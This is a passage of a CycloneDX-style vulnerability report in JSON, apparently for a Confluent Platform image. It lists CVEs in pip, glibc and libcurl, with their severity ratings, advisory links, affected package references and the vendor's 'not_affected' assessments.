          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6357",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        829
      ],
      "description": "pip prior to version 26.1 would run self-update check functionality after installing wheel files which required importing well-known Python modules names. These module imports were intentionally deferred to increase startup time of the pip CLI. The patch changes self-update functionality to run before wheels are installed to prevent newly-installed modules from being imported shortly after the installation of a wheel package. Users should still review package contents prior to installation.",
      "recommendation": "Upgrade pip to version 26.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6357"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/27/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6357"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/b369bfc96cc524e00c267e1693290e6599c36bad"
        },
        {
          "url": "https://github.com/pypa/pip/pull/13923"
        },
        {
          "url": "https://ichard26.github.io/blog/2026/04/whats-new-in-pip-26.1/#security-fixes"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6357"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6357"
        }
      ],
      "published": "2026-04-27T15:16:20+00:00",
      "updated": "2026-06-17T11:00:42+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/pip@26.0.1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6368",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        908
      ],
      "description": "Calling wordexp with WRDE_APPEND in the GNU C Library version 2.0 to version 2.43\u00a0can cause the interface to return invalid memory in the we_wordv member, which on subsequent calls to wordfree may abort the process.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6368"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6368"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6368"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34090"
        },
        {
          "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2026-0014;h=1e9a0039f07471ddfe6816e5df04875bec409f92;hb=HEAD"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6368"
        }
      ],
      "published": "2026-08-10T19:17:30+00:00",
      "updated": "2026-08-12T18:18:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glibc@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-6429",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "When asked to both use a `.netrc` file for credentials and to follow HTTP\nredirects, libcurl could leak the password used for the first host to the\nfollowed-to host under certain circumstances.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6429"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6429"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6429.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6429.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-2pvc-5qw9-h3ph"
        },
        {
          "url": "https://hackerone.com/reports/3677759"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6429"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6429"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
